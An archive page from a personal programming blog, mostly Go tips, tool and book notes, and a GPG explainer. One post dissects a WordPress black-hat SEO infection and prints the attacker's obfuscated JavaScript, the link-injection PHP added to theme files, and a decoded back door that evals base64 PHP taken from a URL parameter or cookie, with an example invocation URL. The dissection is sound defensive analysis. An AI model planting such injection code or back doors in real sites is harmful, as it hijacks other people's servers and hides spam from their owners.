June 28, 2014

Dump Go Abstract Syntax Tree

Posted in Software at 20:09 by graham

Go has good support for examining and modifying Go source code. This is a huge help in writing refactoring and code analysis tools. The first step is usually to parse a source file into its Abstract Syntax Tree representation. Here’s a complete program to display the AST for a given Go file:

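package main

import (
    "fmt"
    "go/ast"
    "go/parser"
    "go/token"
    "os"
)

func main() {
    if len(os.Args) != 2 {
        fmt.Fprintln(os.Stderr, "usage: goast <file.go>")
        os.Exit(1)
    }
    fset := token.NewFileSet()
    // A nil src tells the parser to read the file named by os.Args[1].
    f, err := parser.ParseFile(fset, os.Args[1], nil, 0)
    if err != nil {
        fmt.Fprintln(os.Stderr, err)
        os.Exit(1)
    }
    ast.Print(fset, f)
}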

Use:

  • Save that as goast.go
  • Build it: go build goast.go
  • Run it: ./goast <myfile.go>
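Once you have the tree, the usual next step is to walk it. Here is a minimal sketch using ast.Inspect to collect the names of the functions declared in a file. The funcNames helper and the inline sample source are made up for illustration; they are not part of the program above.

```go
package main

import (
	"fmt"
	"go/ast"
	"go/parser"
	"go/token"
)

// funcNames (a hypothetical helper) parses src and returns the names of the
// functions and methods it declares, in source order.
func funcNames(src string) ([]string, error) {
	fset := token.NewFileSet()
	// Passing a string as src parses that text instead of reading a file.
	f, err := parser.ParseFile(fset, "example.go", src, 0)
	if err != nil {
		return nil, err
	}
	var names []string
	ast.Inspect(f, func(n ast.Node) bool {
		if fn, ok := n.(*ast.FuncDecl); ok {
			names = append(names, fn.Name.Name)
		}
		return true // keep descending into child nodes
	})
	return names, nil
}

func main() {
	src := "package demo\n\nfunc Hello() {}\n\nfunc world() {}\n"
	names, err := funcNames(src)
	if err != nil {
		fmt.Println("parse error:", err)
		return
	}
	fmt.Println(names)
}
```

The same pattern works for any node type: switch on the concrete type of n and pick out the fields you care about.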

May 24, 2014

Sync, a Unix way

Posted in Software at 05:49 by graham

Ever since Dropbox, I’ve been searching for a self-hosted, secure (and now Condi-free) way of keeping my machines synchronised and backed up. There are lots. I tried many, wrote a couple myself, but none were exactly what I wanted.

My problem was thinking Windows, looking for a single program. Once I started thinking Unix, looking for modular components, the answers were obvious.

Storage

First we need a remote master storage to sync against, somewhere to back up our files. And we want that exposed as a local filesystem. I use the most obvious answer, sshfs:

sudo apt-get install sshfs
mkdir -p /home/graham/.backup/crypt  # Why 'crypt'? Read on.

sshfs server.example.com:backup /home/graham/.backup/crypt

You can use any storage that can appear as a filesystem, such as FTP (via curlftpfs), NTFS, and many others.

Encryption

There are two kinds of data: public data, and encrypted data. We want the second kind. Just layer encfs:

Read the rest of this entry »

May 4, 2014

GopherCon 2014 favorite talks, notes

Posted in Software at 19:39 by graham

My favorite talks at GopherCon 2014:

  • Peter Bourgon: Best Practices for Production Environments. SoundCloud were an early Go adopter, and this talk is their distilled learnings from two years of Go: Repo structure, config, logging, testing, deployment, and lots more. The one talk you need if you’re starting (or running) a significant Go project, and you want to do it right.

  • Petar Maymounkov: The Go Circuit: Towards Elastic Computation with No Failures. Stick with this one. It starts off quite academic, but gets fascinating very fast. He models whole companies as a distributed system (based on CSP), then builds a language-agnostic cluster programming library where the API is a filesystem: The Circuit. One of the highlights of the conference for me was building a filesystem with Petar in the hallway.

  • John Graham-Cumming: A Channel Compendium. John is the author of those great in-depth Cloudflare blog posts. Solid talk about Go channels. nil channels always block, so you can ‘disable’ a select clause by setting a channel to nil. Closed channels never block. Heartbeat is just time.Tick, timeout is time.After. Go programs are small sequential pieces joined by channels.
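The nil channel trick from the last talk is easier to see in code. This is my own minimal sketch, not code from the talk: drain is a hypothetical helper that reads two channels until both are closed, setting each one to nil when it closes so that its select case stops firing. A time.After case acts as the timeout.

```go
package main

import (
	"fmt"
	"time"
)

// drain receives from a and b until both are closed and returns how many
// values arrived. A receive from a closed channel never blocks, so once a
// channel is closed we set the local variable to nil: a nil channel always
// blocks, which disables that select case.
func drain(a, b <-chan int) int {
	count := 0
	for a != nil || b != nil {
		select {
		case _, ok := <-a:
			if !ok {
				a = nil // closed: disable this case
				continue
			}
			count++
		case _, ok := <-b:
			if !ok {
				b = nil // closed: disable this case
				continue
			}
			count++
		case <-time.After(time.Second):
			// Nothing arrived for a second: give up.
			return count
		}
	}
	return count
}

func main() {
	a := make(chan int)
	b := make(chan int)
	go func() {
		for i := 0; i < 3; i++ {
			a <- i
		}
		close(a)
	}()
	go func() {
		for i := 0; i < 2; i++ {
			b <- i
		}
		close(b)
	}()
	fmt.Println(drain(a, b)) // 3 values from a plus 2 from b
}
```

Without the nil assignment, the closed channel's case would be ready on every pass and the loop would spin.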

Those are the three talks I enjoyed most. Here are my general notes on the conference and a few of the other talks. Read the rest of this entry »

March 2, 2014

Raw sockets in Go: IP layer

Posted in Software, Uncategorized at 00:41 by graham

In the Internet protocol suite we usually work at the transport layer, with TCP or UDP. Go (golang) has good support for working with lower layers. This post is about working one layer down, at the IP layer.

If you want to use protocols other than TCP or UDP, or craft your own packets, you need to connect at the IP layer.

Receive

Let’s read the first ICMP packet on localhost:

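package main

import (
    "fmt"
    "log"
    "net"
)

func main() {
    protocol := "icmp"
    netaddr, err := net.ResolveIPAddr("ip4", "127.0.0.1")
    if err != nil {
        log.Fatal(err)
    }
    // Opening a raw socket usually needs root (or CAP_NET_RAW on Linux).
    conn, err := net.ListenIP("ip4:"+protocol, netaddr)
    if err != nil {
        log.Fatal(err)
    }

    buf := make([]byte, 1024)
    numRead, _, err := conn.ReadFrom(buf)
    if err != nil {
        log.Fatal(err)
    }
    fmt.Printf("% X\n", buf[:numRead])
}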
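The hex dump is more useful once you pick the fields apart. Below is a rough sketch that decodes the fixed 8-byte header of an ICMP echo message, assuming the buffer starts at the ICMP header (no IP header in front). The icmpEcho type, the parseEcho helper and the sample bytes are all made up for illustration.

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
)

// icmpEcho holds the header fields of an ICMP echo request or reply.
type icmpEcho struct {
	Type, Code uint8
	Checksum   uint16
	ID, Seq    uint16
}

// parseEcho (hypothetical helper) decodes the first 8 bytes of b.
// All multi-byte fields are in network byte order (big endian).
func parseEcho(b []byte) (icmpEcho, error) {
	if len(b) < 8 {
		return icmpEcho{}, errors.New("short ICMP message")
	}
	return icmpEcho{
		Type:     b[0],
		Code:     b[1],
		Checksum: binary.BigEndian.Uint16(b[2:4]),
		ID:       binary.BigEndian.Uint16(b[4:6]),
		Seq:      binary.BigEndian.Uint16(b[6:8]),
	}, nil
}

func main() {
	// Hand-written sample: an echo request (type 8) with ID 1, sequence 1.
	pkt := []byte{0x08, 0x00, 0xF7, 0xFD, 0x00, 0x01, 0x00, 0x01}
	hdr, err := parseEcho(pkt)
	if err != nil {
		fmt.Println(err)
		return
	}
	fmt.Printf("%+v\n", hdr)
}
```

In the program above you would call parseEcho(buf[:numRead]) instead of printing the raw bytes.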

Read the rest of this entry »

March 1, 2014

Three best programming books

Posted in Software at 23:19 by graham

Here are my three favorite programming books, the ones I consider most important and would most recommend. There’s a good list on Stack Overflow too, if you prefer the wisdom of crowds to the wisdom of me.

Code Complete, Steve McConnell

This is the book that took me from enthusiastic amateur to professional. It covers the programming-in-the-small that you will do every day for the rest of your career: Naming variables, writing for loops, that type of thing. I know, you know how to write a for loop already.

This book will make you better at the small things.

Code Complete: A Practical Handbook of Software Construction

The Art of Unix Programming, Eric S. Raymond

It took me a very long time to read this book. I would pick it up, get a few pages in, have an epiphany, and go re-write some things.

Unix is the only constant in our world. The programming language you use will change many times, the tools you use will change all the time, and even SQL is not as much of a constant as it once was. But Unix will always be there for you. Improving your Unix knowledge is the single best investment you can make as a programmer.

But this is not just a book about Unix. It’s a book about the philosophy of Unix, about The Way, and it intends to bring you enlightenment in the Zen Buddhism sense.

For me at least, it did.

The Art of UNIX Programming

The Linux Programming Interface, Michael Kerrisk

This is the Linux grimoire, the spell book with all the spells. It’s over $60, 1500 pages, and you must never get it wet or read it after midnight.

Pretty much everything interesting you do in Linux (open a file, write to a socket, start a process, sleep, allocate memory, everything) is a syscall. This book is all the syscalls, and extensive information around them.

It will answer all your questions.

The Linux Programming Interface: A Linux and UNIX System Programming Handbook

December 12, 2013

Go: How slices grow

Posted in Software at 05:49 by graham

In Go (golang) what happens to memory when you append to a slice?

If there’s enough space in the slice’s backing array, the element just gets added. If there’s not enough space, a new array is allocated, all the items are copied over, and the new item is added at the end. The interesting part is allocating that new array. And here’s the answer:

Go slices grow by doubling until size 1024, after which they grow by 25% each time

This is an implementation detail and may change. The above is correct for Go 1.1 and 1.2.

Try it out:

package main

import "fmt"

func main() {
    var x []int  // nil slice; append treats it like make([]int, 0)
    for i := 0; i < 100; i++ {
        fmt.Printf("%d: %p cap %d\n", i, x, cap(x))
        x = append(x, i)
    }
}
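That prints a line for every append. If you only care about when a new array gets allocated, here is a small variation that records the capacity each time it changes. capChanges is a name I made up, and the exact numbers depend on your Go version, so I am not showing expected output.

```go
package main

import "fmt"

// capChanges appends n ints to a nil slice, one at a time, and returns the
// capacity observed each time it changes, i.e. each time append had to
// allocate a bigger backing array.
func capChanges(n int) []int {
	var x []int
	var caps []int
	last := cap(x)
	for i := 0; i < n; i++ {
		x = append(x, i)
		if c := cap(x); c != last {
			caps = append(caps, c)
			last = c
		}
	}
	return caps
}

func main() {
	// Go past 1024 elements so the change in growth rate is visible.
	fmt.Println(capChanges(5000))
}
```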

Read the rest of this entry »

December 7, 2013

Kinesis Advantage after four months

Posted in Software at 23:58 by graham

I have been using a Kinesis Advantage keyboard for the past four months, since August. I love it. Here’s my trip report.

Kinesis Advantage

Before this keyboard I had been using Microsoft Natural keyboards for many many years.

Let’s cut straight to the chase: The first three days were very hard. It’s the same feeling as when I switched to vim. You tell your fingers to do something and they don’t do it. It’s especially hard when you do lots of text chat. My typing rate went way down, so I couldn’t ‘talk’ as fast.

Read the rest of this entry »

October 22, 2013

Realtime Conf 2013: Favorite talks

Posted in Software at 05:33 by graham

Realtime Conf 2013 just finished in Portland. It was an unusual conference in many ways. The “production values” and effort the &yet team put into it were simply astounding. The conference included, amongst others, a book, a play, a marching band, boxes of dirt, meth samples, and a beautiful song (skip to 3:50).

All the videos are online. These are my three favorite:

Isaac Schlueter: Leadership and open source: Also known as “Z”, he is the main author of npm and leader of the node.js community. He teaches leadership in tweets, around a core philosophy of empathy, compassion, and grit. If your life involves having to interact with humans, I’d recommend this talk.

Ilya Grigorik: Making HTTP realtime with HTTP 2.0: HTTP 2.0 is the next version of HTTP. It is based on SPDY. It could be ready as early as next year. And it’s way cool.

Eric Rescorla: What WebRTC is good for: He wrote much of Firefox’s WebRTC implementation, and some of Chrome’s, so if you want to learn about WebRTC, watch this.

The best part for me was the conversations (especially with the XMPP folks) and how generous everyone was with their time and explanations.

September 17, 2013

WordPress Black Hat SEO dissected

Posted in Software at 21:00 by graham

Last weekend a friend asked me why there were pharma links hidden in her GoDaddy hosted WordPress site, and that led me into the WordPress black hat SEO rabbit hole.

Front end

This is what we were seeing:

pharma-links

From a browser the site looked fine. The links had been there undetected for five months! The HTML is being hidden by this CSS:

<style type="text/css">.blogcycle_p{position:absolute;clip:rect(438px,auto,auto,438px);}</style>

But that CSS doesn’t appear anywhere on the page. It’s being written out by this obfuscated JavaScript:

var _gw7 = [];
_gw7.push(['_trackPageview', '1301851861911781711021861911821711311041861711901861171']);
_gw7.push(['_setOption', '6918518510413211616817818117316919116917817116518219318']);
_gw7.push(['_trackPageview', '2181185175186175181180128167168185181178187186171129169']);
_gw7.push(['_setOption', '1781751821281841711691861101221211261821901141671871861']);
_gw7.push(['_trackPageview', '8111416718718618111412212112618219011112919513011718518']);
_gw7.push(['_setOption', '6191178171132']);
var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw7.length; v++) t += _gw7[v][1];l=t.length;
while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70);
document.write(z);

Presumably this is being done so that Google doesn’t notice that the links are not visible. The number in the _gw7 variable name varies – maybe it’s random or maybe a version number. You can find many other victims by searching for 13018518….
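To see what the script writes without running it in a browser, you can redo the decoding by hand: join the six strings, cut the result into three-digit groups, and subtract 70 from each to get a character code. Here is that as a small Go sketch. The decode function and the chunks variable are my names; the digit strings are copied from the script.

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// chunks holds the second element of each _gw7.push call, in order.
var chunks = []string{
	"1301851861911781711021861911821711311041861711901861171",
	"6918518510413211616817818117316919116917817116518219318",
	"2181185175186175181180128167168185181178187186171129169",
	"1781751821281841711691861101221211261821901141671871861",
	"8111416718718618111412212112618219011112919513011718518",
	"6191178171132",
}

// decode mirrors the JavaScript loop: concatenate the strings, read three
// decimal digits at a time, and subtract 70 to get each character code.
func decode(parts []string) (string, error) {
	t := strings.Join(parts, "")
	if len(t)%3 != 0 {
		return "", fmt.Errorf("length %d is not a multiple of 3", len(t))
	}
	var out strings.Builder
	for pos := 0; pos < len(t); pos += 3 {
		n, err := strconv.Atoi(t[pos : pos+3])
		if err != nil {
			return "", err
		}
		if n < 70 || n-70 > 255 {
			return "", fmt.Errorf("value %d out of range at offset %d", n, pos)
		}
		out.WriteByte(byte(n - 70))
	}
	return out.String(), nil
}

func main() {
	css, err := decode(chunks)
	if err != nil {
		fmt.Println(err)
		return
	}
	fmt.Println(css)
}
```

It prints the style tag shown earlier, .blogcycle_p rule and all.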

Back end – display

The big question then became: How the hell is this getting onto the page?

The answer is the PHP has been edited. The functions.php in every single theme had this appended to the bottom (scroll all the way to the right for the important part):

if (!function_exists("b_call")) {
function b_call() {
if (!ob_get_level()) ob_start("b_goes");
}
function b_goes($p) {
if (!defined('wp_m1')) {
    if (isset($_COOKIE['wordpress_test_cookie']) || isset($_COOKIE['wp-settings-1']) || isset($_COOKIE['wp-settings-time-1']) || (function_exists('is_user_logged_in') && is_user_logged_in()) || (!$m = get_option('_iconfeed1'))) {
        return $p;
    }
    list($m, $n) = @unserialize(trim(strrev($m)));
    define('wp_m1', $m);
    define('wp_n1', $n);
}
if (!stripos($p, wp_n1)) $p = preg_replace("~<body[^>]*>~i", "$0\n".wp_n1, $p, 1);
if (!stripos($p, wp_m1)) $p = preg_replace("~</head>~", wp_m1."\n</head>", $p, 1);
if (!stripos($p, wp_n1)) $p = preg_replace("~</div>~", "</div>\n".wp_n1, $p, 1);
if (!stripos($p, wp_m1)) $p = preg_replace("~</div>~", wp_m1."\n</div>", $p, 1);
return $p;
}
function b_end() {
@ob_end_flush();
}
if (ob_get_level()) ob_end_clean();
add_action("init", "b_call");
add_action("wp_head", "b_call");
add_action("get_sidebar", "b_call");
add_action("wp_footer", "b_call");
add_action("shutdown", "b_end");
}

My knowledge of WordPress is basic, so the first few times I looked at this it seemed fine. It was only thanks to an analysis by NinjaFirewall that I went and looked again. The get_option('_iconfeed1') is reading from the database, reversing the value, and injecting it into the page. The name of the option changes; presumably it’s picked from a list at infection time. There’s a nice touch here where it doesn’t show to logged in users, which probably complicates investigation (“My site looks fine, your computer must have a virus or something!”).

In the wp_options database table, the _iconfeed1 option contains the JavaScript and HTML string with all the pharma links, reversed. Why is it reversed? I’m not sure. Maybe it defeats some WordPress plugins that look for this type of thing. It certainly defeated my initial grep of the database dump.

Back end – input

But wait, it’s about to get so much better, because the next question is how the hell did they write to wp_options. An svn diff of the WordPress install against the repo reveals these new files:

  • wp-content//entry-nav.php # In several, but not all, themes
  • wp-content//sidebar-meta.php # Only in one theme
  • wp-admin/ms-media.php
  • wp-admin/includes/class-wp-menu.php
  • wp-includes/theme-compat/archive.php
  • wp-includes/post-load.php

The names differ on other infected sites, but seem chosen to look like parts of WordPress. And what’s in those files? Oh, you’re in for a treat – here’s the first few lines of one:

$bawdy= 'T';
$concoct = 'e';$cretin= '2XRa)$r)';$eyers= ';$_';

$befogged= 'e'; $gayety ='a';$jolynn ='8'; $armour ='$0QP('; $hotdick ='K';$brief='a)Q$TM';$boxtop = 'e'; $grating='i'; $fuckyoufuckyou ='s';$claus='P';
$blitzes = '$[n>EO_';$cancels = 'N(gL';$fernanda= 'cV;E;r)6';$hasty =':i_e_';

$carla = '$(Wa'; $duplicable=',2aC(';
$dolli = 't'; $contributing='$';

They all follow the same pattern, with variable names clearly taken from a word list. Most of them didn't seem to run: they were missing variables and a closing php tag. For analysis, here's a full one (minus php tag) that did run, and that I've hacked around to display its output: obfuscated php (To understand it look for 'hello').

It decodes to this:

$i=array_merge($_REQUEST,$_COOKIE,$_SERVER);
$a=isset($i["b02005f9ffdf8"])
    ? $i["b02005f9ffdf8"]:
(isset($i["HTTP_B02005F9FFDF8"])?$i["HTTP_B02005F9FFDF8"]:die
);
eval(base64_decode($a));

That takes base64 encoded PHP code in either a URL parameter or a cookie, and runs it. The cookie part is nice, because it won’t show in the access logs. The hex string is a nice touch too. It changes for each infection, so other people will have a hard time taking advantage of the back door.

To run echo "<h1>Hello</h1>"; the attacker would hit something like:

http://example.com/wp-includes/post-load.php?b02005f9ffdf8=ZWNobyAiPGgxPkhlbGxvPC9oMT4iOw==
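If you find a request like that in your logs, you can recover the PHP the attacker ran by base64-decoding the parameter. A minimal sketch, where decodeParam is a helper name I made up and the URL is the example one above:

```go
package main

import (
	"encoding/base64"
	"fmt"
	"net/url"
)

// decodeParam (hypothetical helper) pulls the named query parameter out of
// rawURL and base64-decodes it, returning the PHP source the back door
// would have passed to eval.
func decodeParam(rawURL, param string) (string, error) {
	u, err := url.Parse(rawURL)
	if err != nil {
		return "", err
	}
	decoded, err := base64.StdEncoding.DecodeString(u.Query().Get(param))
	if err != nil {
		return "", err
	}
	return string(decoded), nil
}

func main() {
	hit := "http://example.com/wp-includes/post-load.php?b02005f9ffdf8=ZWNobyAiPGgxPkhlbGxvPC9oMT4iOw=="
	php, err := decodeParam(hit, "b02005f9ffdf8")
	if err != nil {
		fmt.Println(err)
		return
	}
	fmt.Println(php) // echo "<h1>Hello</h1>";
}
```

This only helps when the payload came in as a URL parameter. If it came in a cookie, as it did on my friend's site, the access log has nothing to decode.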

Who did it? How?

Who did it? In the Apache access logs the only hit I see on one of those injection scripts is from a hosting provider in Germany that does VPS and dedicated hosting. One single hit, and because it has a cookie I don’t have the PHP that they ran. Around that time I see a ton of probing from an address in Israel, a little suspicious given that the site is a local Canadian business, but it’s certainly not conclusive. I have no idea who did it.

How? I’m not sure. There were only two accounts on that site, with what I’d consider good passwords. Like every WordPress site it was getting lots of brute force cracking attempts, but POSTing to the login page gets you about 2 attempts / second (my sites use BruteProtect to reduce this). My leading theory then is that the attackers got into a different site on the shared hosting, and just wrote into every other site on that machine (which are just different directories it seems).

How did I fix it? I moved my friend off GoDaddy’s shared hosting, to my own WordPress multi-site on a Linode server.

The crazy part is that the sole purpose of the attack is to raise the page rank of some pharma links. I didn’t realise SEO was such big business that people would go to all this work.

I am also quite in admiration of the poor programmer who had to build this. Imagine trying to debug the CSS that was output by your reversed obfuscated JavaScript, which was written into the database by base64 encoding it and feeding it to an obfuscated PHP script! I tip my hat to you, Mr Black Hat SEO programmer.

Here are some other people who have the same problem but with different variables. And here’s what seems to be an earlier variant of this attack.

If you have any more information about this, please let me know in the comments, and I’ll update the post. Thanks!

July 30, 2013

How GPG works: Encrypt

Posted in Software at 22:02 by graham

Here’s what happens when you encrypt a message with GPG / GnuPG (and probably other OpenPGP implementations):

  1. Generate session key

    When you encrypt a file to someone (-r person on the command line), GPG generates a session key, which is a large random number. You can see it when you decrypt a message:

    gpg --show-session-key myfile.gpg
    
  2. Choose a symmetric cipher

    GPG then looks at the recipient’s public key to find their preferred symmetric cipher. If you have my key on your ring (get it by doing gpg --recv-keys 0x127CFCD9B3B929D2) you can see my preferred symmetric cipher by typing:

    gpg -r graham -e --verbose test.txt
    

    It should be AES256.

  3. Encrypt using chosen cipher and generated session key

    Next it compresses then encrypts the file using the session key and the preferred cipher. Up to this point everything is symmetric encryption.

  4. Encrypt session key with public key

    Finally it encrypts that session key using the recipient’s public key (using RSA), and prepends the result to the message. If there are several recipients, this step is repeated once for each person.

The passphrase GPG asks for when decrypting or signing a message has nothing to do with message encryption. It is only used to symmetrically encrypt your private key (default is CAST5 cipher). That’s in case someone steals your private key file. In terms of how GPG works, you can ignore the passphrase. If you just encrypt a message (without signing it) you won’t need to enter your passphrase at all (but in practice you should always sign your messages).
